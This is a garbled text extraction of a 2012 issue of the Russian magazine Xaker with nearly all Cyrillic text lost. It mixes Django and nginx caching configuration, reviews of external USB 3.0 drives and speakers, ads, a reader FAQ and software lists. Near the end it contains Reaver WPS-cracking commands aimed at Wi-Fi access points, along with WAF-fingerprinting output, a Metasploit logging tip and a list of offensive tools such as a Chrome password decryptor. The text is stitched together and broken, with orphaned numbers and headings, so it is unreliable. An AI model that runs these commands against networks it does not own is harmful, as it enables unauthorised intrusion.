CACHE_BACKEND = 'memcached://127.0.0.1:11211/'
# ( , )
CACHE_BACKEND = 'db://_'
#
CACHE_BACKEND = 'file://///'
#
CACHE_BACKEND = 'locmem:///'
# ( )
CACHE_BACKEND = 'dummy:///'

. manage.py:
# python manage.py createcachetable _
- :
timeout (
300);
max_entries (
300);
cull_frequency ,
max_entries ( 3,
).
CGI, :
CACHE_BACKEND = "locmem:///?timeout=30&max_entries=400"

-

-
128
uWSGI

, ,
, ,
. ,
, , ,

.
Django
settings.py:
#
MIDDLEWARE_CLASSES = (
#
'django.middleware.cache.CacheMiddleware',
# middleware...
'django.middleware.cache.FetchFromCacheMiddleware',
)
# " "
CACHE_MIDDLEWARE_SECONDS='300'
.
. .
.
johnny-cache,
memcached -.
. johnny-cache Django-:
INSTALLED_APPS = (
...
'johnny',
)
middleware:
MIDDLEWARE_CLASSES = (
'johnny.middleware.LocalStoreClearMiddleware',
'johnny.middleware.QueryCacheMiddleware',
...
)
03 /158/ 2012
-- memcached
(
memcached):
CACHE_BACKEND =
'johnny.backends.memcached://127.0.0.1:11211'
JOHNNY_MIDDLEWARE_KEY_PREFIX='jc_host_com'
, !

, -.
, -
,
, , , , ,
.
, .
,

. ,
:
,
Django, -,
. , , :).
Django -

cache, :
NGINX
,
nginx. proxy_
store try_files:
location / {
root /var/www/;
try_files /cache/$uri @storage;
}
location @storage {
proxy_pass http://backend;
proxy_set_header Host $host;
proxy_store on;
proxy_store_access user:rw group:rw all:r;
proxy_temp_path /var/www/cache/;
root /var/www/cache/;
}

/var/www/cache ( tmpfs,
),
( 10 ):
$ cd /var/www/cache
$ find ./ -type f -amin +10 -delete
uWSGI Django
-, . ,

load ( ):
{% load cache %}
cache :
{% block header %}
{% cache 5000 header-cache %}
{% block logo %}
{% endblock %}
{% block menu %}
{% endblock %}
{% endcache %}
{% endblock %}
. header logo
menu, cache. , logo menu
, 5000 , .
cache , .
,
-
(,
, . .), , , .
:
{% block sidebar %}
{% cache 500 sidebar-cache request.user.username %}
...
{% endcache %}
{% endblock %}
Django- , .
.
. z
cron.
03 /158/ 2012
129
FERRUM
!

USB 3.0

, . -
( ).
,
- . , ,
,
( .
). , ,
, ,
.
, , , , -.
6 .
130

.
HD Tune Pro , HDD
. ,
, .

HDD PCMark Vantage. , ,
.
, / , ,

. , -
, , , .
03 /158/ 2012
ADATA NH13

ADATA. ADATA
NH13 750 , :
500/750 .
,
, HDD,
.
, Mini
USB 3.0.
,
,
. ,
:
USB 3.0 .
ADATA NH13 ,
.
HDD ( DVD c Windows 7),
.
3000
.
SEAGATE
STAA1500100
5000
.
03 /158/ 2012
Seagate . ,
- ,
- . , GoFlex
SATA-, SATA.
- ,
, , USB , eSATA
FireWire 800. Seagate STAA1500100 USB 3.0. , ,
.
Seagate STAA1500100
.
, 1,5
. ,

.
131
FERRUM
SILICON POWER
SP750GBPHDS20S3U
Silicon Power,
. HDD .

. ,
. Mini USB 3.0 ,
, .
750 , 500
1000 . : , ,
, Silicon Power SP640GBPHDS10S3N. -
: ,
. ,
, , , ,
.
2700
.
TRANSCEND TS1TSJ25H3P
, ,
. , ,
.
Transcend ,
,
.
, .
: USB 3.0,
. -
. ,
1 , Transcend TS1TSJ25H3P. ,
(500 750 ), , , .
3600
.
:
:
:
:
:
132
ADATA NH13
750
2,5"
USB 3.0
77 16 118
165
Silicon Power
SP750GBPHDS20S3U
Seagate STAA1500100
1,5
2,5"
USB 3.0
89 120 22
280
750
2,5"
USB 3.0
80 21 142
160
03 /158/ 2012
VERBATIM 53035

- Verbatim 53035. ,
StorenGo . , , , . ,
. , Verbatim
53035 , HDD. , ,
Mini USB 3.0. ,
1 ,
.
,
Verbatim 53035
.
:
Nero, Green Button,
. ,
.
, , .
3800
.
WESTERN DIGITAL
WDBACX0010BBK
,
. My Passport
Essential SE ,
: , , . ,
, , .
: , Mini USB 3.0
. My Passport Essential SE
, 750 .
-
, ,
2,5- HDD. 1000 , . ,
. ,
. ,
.
3500
.
AWARDS
Transcend
TS1TSJ25H3P
1
2,5"
USB 3.0
81 22 131
256
03 /158/ 2012
Verbatim 53035
1
2,5"
USB 3.0
82 20 127
185
Western
Digital WDBACX0010BBK
1
2,5"
USB 3.0
83 18 110
200
, ,
.

, ,
, . ,
, , Verbatim 53035. ,
, Silicon Power SP750GBPHDS20S3U. z
133
FERRUM
PCMARK VANTAGE,
ADATA NH13 750
ADATA NH13 750
Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U
Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U
Transcend TS1TSJ25H3P
Verbatim 53035
Verbatim 53035
Western Digital
WDBACX0010BBK
Western Digital
WDBACX0010BBK
0
00 00 00 500 000 500

0
3
2
50 10 15 20
3
0 10 15 20 25 30 35 40 45
PCMark Vantage

, , ,
PCMARK VANTAGE, /
HD TUNE PRO (WRITE), /
ADATA NH13 750
ADATA NH13 750
Seagate STAA1500100
Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U
Silicon Power
SP750GBPHDS20S3U
Verbatim 53035
Verbatim 53035
Western Digital
WDBACX0010BBK
Western Digital
WDBACX0010BBK
Windows Defender
Gaming
Improting Pictures to Windows photo Gallery
Windows Vista startup
Video editing using Windows Movie Market
Windows Media Center
Adding music to Windows Media Player
Application loading
0 10 20 30 40 50 60 70 80
20 40 60 80 100 120 140
HD Tune Pro (Write), / .

- ,
.
HD TUNE PRO (READ), /
ADATA NH13 750

Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U
Verbatim 53035
Western Digital
WDBACX0010BBK
HD Tune Pro (Read), / .
20
40
60
80
100
120
140
: ,
134
03 /158/ 2012
FERRUM
:
: RMS 25 + 25
(THD + N = 10 %)
-: > 85
: < 0,05 %
: 20 ~ 20
: 700 100
: , , FM,
: 5,75 (148 ),
, 6 ,
: 1 (25 ),
, , 6
: : 318 191 x 284 ;
: 318 186 271
: RCA- (RCA-RCA RCA
AUX), FM-, SD-, USB-
: 11
4800
.
EDIFIER R2500
2.0

Edifier, 2.0
R2500 ( Studio 5)
, . , , ,
. , , ?
, Edifier R2500

. - , .
Edifier R2500 MDF
.
.
,
5,75- -
- .
. Edifier R2500
,
.
.
136
.
Edifier R2500 .
( , , FM-),
USB- SD-. Edifier
R2500 MP3 WMA.

. .
.
RCA- (RCA-RCA RCA AUX),
FM-. Edifier
R2500 .

50 , -
5,75- -.
6 .
, , .
, Edifier R2500
.
! ,
. . .
, Edifier R2500
.
, ,
.

. , ,

2.1 5.1. ,

.
, Edifier R2500, ! z
03 /158/ 2012
12 2200 .
6 1260 .
,
!
.
: 210

GOOGLE CHROME 030
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
LULZSEC / FOX NEWS
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .

WINDOWS 7
PHPMYADMIN
064

ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS

+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (

, , ).
FERRUM
WEXLER.BOOK
T7055
, ,

, ,
.
,
, - .
WEXLER.BOOK T7055 , .

: ,
,
WEXLER.BOOK T7055 ,

-. !
, ,
,
,
. , , ,
, , WEXLER.BOOK T7055.
: !
, ,
, ,
,
,
. ,
.

,
.
TFT-
.
WEXLER.BOOK T7055 G-,
138
:
: , , 7, LED
: 8
: microSD, 32
: ANSI, Unicode, TXT, PDF,
HTML, PDB, EPUB, FB2, DJVU, DOC
: MP3, WMA, FLAC, AAC, WAV,
OGG
: JPG, BMP, GIF
: WMV, RM, AVI, RMVB, 3GP, FLV,
MP4, DAT, VOB, MPG, MPEG, MKV, MOV
: FM-
: 190 x 125 x 11,5
: 315

+
+
3500
.
,
.

,
microSD 32 .
, , ,
,
. FM-
.
, WEXLER.
BOOK T7055 .
.
.
.
,

.
microSD
. , WEXLER.
BOOK T7055 . , ,
FM-. z
02 /157/ 2012
>> coding
!
shop.glc.ru

40%

8-800-200-3-999
+7 (495) 663-82-77 ()
6 1110 .
13 1999 .
6 1110 .
13 1999 .
6 564 .
13 1105 .
6 1110 .
13 1999 .
6 810 .
13 1499 .
6 1110 .
13 1999 .
6 630 .
13 1140 .
6 895 .
13 1699 .
6 1194 .
13 2149 .
6 894 .
13 1699 .
6 775 .
13 1399 .
6 950 .
13 1699 .
6 810 .
13 1499 .

AUDI A7
NEED FOR SPEED: THE RUN

"./#.1

350.589

;8IEB?8G
4@4EB

.EEDFOR3PEED4HE2UN
.E
4OYOTA#AMRY
6 690 .
13 1249 .
UNITS / FAQ UNITED
(twtitter.com/stepah)
FAQ United

FAQ@REAL.XAKEP.RU

DROPBOX.COM.
,

?
!

4,5
- . Dropbox.com

. ,
,

.
, 500

Dropbox 500
.
Dropbox,

(bit.ly/AEhbvD). , AutoPlay (,
, )
Dropbox. Windows 7
Control Panel Hardware and Sound
Autoplay, XP
.
,
Q WAF
( -)?
! WAF
, .
,
, ,
WAF. , impervadetect (code.google.com/p/imperva-detect)

Imperva WAF:
# ./imperva-detect.sh https://www.
example.com
Testing [https://www.example.com] for
presence of application firewall --Test 0 - Good User Agent...
/ application firewall possibly present
Test 1 - Web Leech User Agent...
Test 2 - E-mail Collector Robot User
Test 3 - BlueCoat Proxy Manipulation
Test 4 - Web Worm Blocking...
/ application firewall not detected
Test 5 - XSS Blocking...
--- Tests Finished on [https://www.
example.com]
4 out of 5 tests indicate Imperva
application firewall present ---
WAFW00F
(code.google.com/p/waffit),
WAF.
, SVN.

,
,
MAC-?

! MAC-

Google
Location Services (samy.pl/mapxss) Skyhook
(www.skyhookwireless.com). ,

. ,
MAC-,

,
. ,

,
Google
,

Wi-Fi.
- 15
-

.
HTML5.

. ,
UI-.
140
Twitter
UI Bootstrap (twitter.github.
com/bootstrap). ( )

( IE7).
.
, , .
Bootstrap
,
. Bootstrap ,
940-.
03 /158/ 2012
FAQ UNITED
? ,

?
.

Binwalk (code.google.
com/p/binwalk).

,

.
, , firmware,
Linux, , . .

-.

- .
.
,

. ?

MYSQL?
Comet.
, Comet
,

( )
.

- : Comet
-
(bit.ly/yZ7OtH). Comet-, -
,
show processlist.
processlist
information_schema,
SQL-:
mysql -u root -p -BNe "select

host,count(host) from processlist
group by host;" information_schema
Dklab_Realplexor (dklab.ru/lib/
dklab_realplexor) Socket.IO (socket.
io). Dklab_Realplexor
,
(
PHP Python), Socket.
IO LEGO
mindshtorms
API
.
Comet-
push-,
-
, .
: Pusher (pusher.Comet), Pubnub
(www.pubnub.com), Partcl (code.google.
com/p/partcl), BeaconPush (beaconpush.
com), X-Stream.ly (x-stream.ly) ioBridge
(iobridge.com).
(bit.
ly/yLJcqm).

MSF?
Metasploit Framework
,
,

. ,

<Ctrl + C>,

. ,
MSF , ,
, ,
,
.

. ! - , !
MSF

, Twitter.
, , . ,
Bootstrap.
.
03 /158/ 2012
Pusher -,

Bootstrap ,
jQuery-. ,

, .
12
jQuery-,
, ..
BootStrap
,
, ,

, .
,
, -, . .
141
UNITS / FAQ UNITED

spool /root/owned_info.txt.
/root/owned_info.txt MSF .
, , spool (
). , , .

spool off.
-.
Q -

,
. GREP
:).

glogg (glogg.
bonnefon.org).

--- .
,
grep less.
-
WINDOWS,
. -

, ,
?
,
. ,

, :

.
Windows Event Viewer Plus
(http://bit.ly/znh9fS) Windows 8 Log Collector
(http://bit.ly/wyDI0m).

,
.

,

.

.
-,
. -

?
,
SMS;
;
, Android API;
broadcast-;
SMS .
Windows- . ,
.
.
?
USB-,

.
,
X Y
.
Arduino.
webaff (bit.ly/zNDkpD).
, ,
-,
, -,
.
Knas Restarter (www.
knas.se). , , , Knas
Restarter ,
.
.

,

,
.
?
.

,
,

,
. ,

?
Android! DroidBox
(code.google.com/p/droidbox),
.
:
;
/ ;
;
, DexClassLoader;

Evalaze (www.
evalaze.de). ?
.
.

, ,

!

.
-

,
GOOGLE DOCS,
?
Joukuu
(www.joukuu.com). Joukuu
(
Dropbox, Google Docs Box.net),
- ,
. ,
Google Docs Microsoft Office
,

Google. z
Windows-
142
03 /158/ 2012
>Net
Alpine 2.0
AthTek NetWalk Home Edition
Bluetooth Stack Switcher 1.1
DreamMail 4.6.9.0
eToolz 3.4.8
FTP Scheduler
MetroTwit
NeoDownloader 2.9
RaidCall 6.0.8
RealVNC 4.1
>Multimedia
Caesium 1.4.1
Color Desker
Free Audio Editor 2011
Free Video Dub 2.0.3
ImageGlass 1.4
IOGraph 0.9
Joukuu 1.1.5
KooBits 4.0
Little Piano 1.0.1
Motion Man
MuseScore 1.1
MusicBee 1.3.4334
Scan Tailor 0.9.11
Stealth Player 1.0
view3dscene 3.11.0
Windows 7 Logon Screen
Tweaker 1.5
>Misc
Apple Wireless Keyboard
Autosensitivity 1.4
BabyPDF 1.0
Ditto 3.18.24
Duplicate Commander 2.2
ISO Workshop 2.1
Lion UX Pack 1.0
MadAppLauncher 1.1
NexusFile 5.3.1
Pokki
Process Blocker 0.7 beta
RED 2.2
TaggedFrog 1.1
UndoClose 1.1
Volume Concierge
>>WINDOWS
>Development
ASMTool 1.3.1BETA
BinVis
Box2DFlash 2.1a
FlashDevelop 4.0.1
Geany 0.21
haXe 2.08
LINQPad 4.31
MongoDB 2.0.2
PluThon 2.0.0
ReSharper 6.1
Selenium IDE 1.6.0
SQLite 3.7.10
Unique 0.25
Visual Paradigm for UML 8.3
Community Edition
WebStorm 3.0.1
Zend Studio 9
>>UNIX
>Desktop
Asunder 2.1
Cinnamon 1.1.3
Clementine 1.0.0
Converseen 0.4.8
Echinus 0.4.9
Eina 0.14.0
Hugin 2011.4.0
>System
Auslogics Disk Defrag 3.3.0.2
DataGrab 1.2.3
Defraggler 2.09.391
DFIncBackup 2.98
Evalaze 1.1
History Viewer 4.8
Knas Restarter 2.0
MyDefrag 4.3.1
P-Apps 1.0
Puran Defrag 7.3
Speed Up Shutdown
UltraDefrag 5.0.2
USB Image Tool 1.58
Windows 8 Log Collector 1.0.0.6
>Security
Anti-Reversing Framework v1.1
BSQL Hacker 0.9.0.9
Chrome Password Decryptor 3.5
CodeReload
DAVTest 1.0
DbgCb
Deblaze 0.3
DroidBox
ExploitMyUnion 2.1
Fiddler 2.3.8.5
FindBugs 2.0.0
FiveBelow
grinder
Hexjector 1.0.7.4
HstEx 3.7
JavaSnoop 1.1
loadbalancer-finder 0.5.1
loadbalancer-finder v0.5.1
Mandiant Redline 1.0.3
RainbowCrack 1.5
Redline 1.0.3
RIPS 0.51
Scrapy 0.14
Scylla Imports Reconstruction
0.5a
Sessionthief
Sikuli-X 1.0rc3
SnD Reverser Tool 1.4
sslyze 0.3
VERA 0.3
WinTaylor 2.5.1
SecurityKiss 0.2.2
Seesmic 0.8.1
ST Proxy Switcher
streamWriter 3.6
TunnelBear
TweetDeck
WeFi 4.0.1.0
>Security
binwalk v0.4.1
BoNeSi 0.2.0
crackerpassword 1.2.1
DroidBox
FindBugs 2.0.0
Fwknop Port Knocking Utility
2.0rc5
grinder
ipt_pkd 1.10
LFI Fuzzploit Tool
loadbalancer-finder v0.5.1
NETZOB 0.3.1
>Net
Blogilo 1.0
EiskaltDC++ 2.2.5
Firefox 9.0.1
FreeRDP 1.0.0
LAN Messenger 1.2.16
LeechCraf 0.4.95-578
Masqmail 0.3.4
NTM 1.3.1
ownCloud 2.0.1
PirateWall 0.2.1
pyLoad 0.4.9
QupZilla 1.1.0
RSSOwl 2.1.2
SquidAnalyzer 4.2
Super Flexible File Synchronizer
5.61
Tixati 1.82
Window Switch 0.12.9
ZMail 0.7
>Devel
ART 0.9.01
Controlled Vars 1.3.1
Eric 5.1.8
Freeglut 2.8.0
FreePascal 2.6.0
Gambas3 3.0.0
GNU Octave 3.6.0
GTK 3.3.10
Jython 2.5.2
LatencyTOP 0.5
libircclient 1.6
mxGraph 1.9.0.2
NetBeans 7.1
PHP 5.3.9
ProjectOr RIA 1.9.1
Reportico 2.3.1
Rudiments 0.35
Ultimix 1.5.177
wxPython 2.9.3.1
ISO Master 1.3.9

LibreCAD 1.0.0
LibreOffice 3.4.5
Rhythmbox 2.95
RunLens 0.02
Scribus 1.4.0
slowmoVideo 0.2.5
SMPlayer 0.6.10
SyncWall 1.1.0
tvpvrd 3.3.4
Xine-lib 1.2.0
>>MAC
Adium 1.4.4
birthdayBook 6.0.6
Boxer 1.2.1
Cappuccino 1.11
fp 5.1
iFileX 1.1.1
iTweaX 3.0.2
LimeChat 2.30
MediaTube 1.0
Permanent Eraser 2.5.3
Praat 5.3.04
Raidcall 2.0
ShadowKiller 1.3
Skim 1.3.19
Sonora
SpeedTao beta1
TftpServer 3.4.1
Tunnelblick 3.2.3
>X-distr
PC-BSD 9.0
>System
Calculate-assemble 2.2.27
Coreutils 8.15
fstransform 0.3.7
Ipt-netflow 1.7.1
LCMC 1.2.0
Linux 3.2.2
Loadbars 0.4.0
oobash 0.39.1
OpenNebula 3.2.0
OpenNMS 1.8.17-1
Parallel 20120122
Raider 0.9.2
rxvt-unicode 9.15
systemd v38
Usermin 1.580
>Server
Apache 2.2.21
Asterisk 10.1.0
BIND 9.8.1-p1
CUPS 1.5.0
Dhcp 4.2.3-p2
Dovecot 2.0.17
FreeRADIUS 2.1.12
lighttpd 1.4.30
MySQL 5.5.20
NSD 3.2.9
OpenLDAP 2.4.28
OpenVPN 2.2.2
Postfix 2.8.7
PostgreSQL 9.1.2
OpenSSL 1.0.0g
RainbowCrack 1.5
Scapy 2.1.0
Scrapy 0.14
Social Engineer Toolkit v2.5
Spamdyke 4.3.1
Sshguard 1.5
sslyze 0.3
Stegnate 0.0.1
xca 0.9.1
03(158) 2012
UNITS / WWW2
WWW2
IFTTT
ifttt.com
IFTTT: if this, then that
, . ,
-: Gmail, Dropbox, Evernote, Instapaper, Facebook,
Twitter, Instagram, Foursquare . , : Facebook, . :
, SMS. -
, . Gmail
- , Evernote. RSS, e-mail. .
-
DUCKDUCKGO
duckduckgo.com
, . 2008
. -, DuckDuckGo
, . -, ,
. -, goodies, z (
..). DuckDuckGo
( , ).
nazamok.com
, .
. JavaScript IFrame . . , , -
.
,
nazamok.com. , -
150 ,
. , e-mail.
www.hacking-lab.com
.
, , . .
OWASP Hacking-Lab.
( LiveCD VirtualBox), VPN- , . ,
, . .
144
03 /158/ 2012

Хакер 2012 03 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2012 03 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

GOOGLE CHROME

23% - NAND Apple.

Chrome ASLR + DEP +

PoC McAfee SaaS

THE PIRATE BAY

GOOGLE MOZILLA Firefox.

SECURITY RESEARCH LABS GSM. .

6. Reaver Pro Reaver

# reaver -i mon0 -b 00:21:29:74:67:50

# reaver -i mon0 -b 00:01:02:03:04:05 -d 0

# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

d0znpp (ONsec, http://oxod.ru)

CRLF PHP Internet Explorer 7/8/9.

bit.ly/ACOlSL Goodbye HTTP Response

PHP 4.4.2 5.1.2 ,

if (name && strpbrk(name, "=,; \t\r\n\013\014") != NULL)

Content-Security-Policy: allow http://*:80.

, 20, - 10000 :-). ,

70 000 - 150 000

170 000 - 250 000

250 000 - ...

70 000 - 120 000

120 000 - 150 000

150 000 - ...

70 000 - 110 000

90 000 - 150 000

150 000 - ...

70 000 - 100 000

100 000 - 150 000

150 000 - ...

80 000 - 100 000

100 000 - ...

90 000 - 110 000

110 000 - ...

DBA (Oracle, MySql, Postgres

80 000 - 130 000

130 000 - 150 000

150 000 - 180 000

90 000 - 150 000

150 000 - 180 000

180 000 - 250 000

80 000 - 150 000

150 000 - 200 000

200 000 - ...

80 000 - 150 000

150 000 - 200 000

200 000 - ...

70 000 - 120 000

120 000 - 200 000

200 000 - ...

I CAN CRACK IT!

. Captcha- #135 #126

for(each pixel in CAPTCHA)

DOM based XSS (www.owasp.org/index.php/

Suite, Firefox Tamper Data.

Exploit . SQL- sqlmap

GreenDog , Digital Security (twitter.com/antyurin)

Microsoft SQL server .

, DNS-. Windows , NetBIOS Name Service.

, su .text ( DYN, EXEC).

Linux >=2.6.39, 32- 64-.

execExtTable dd offset a_exe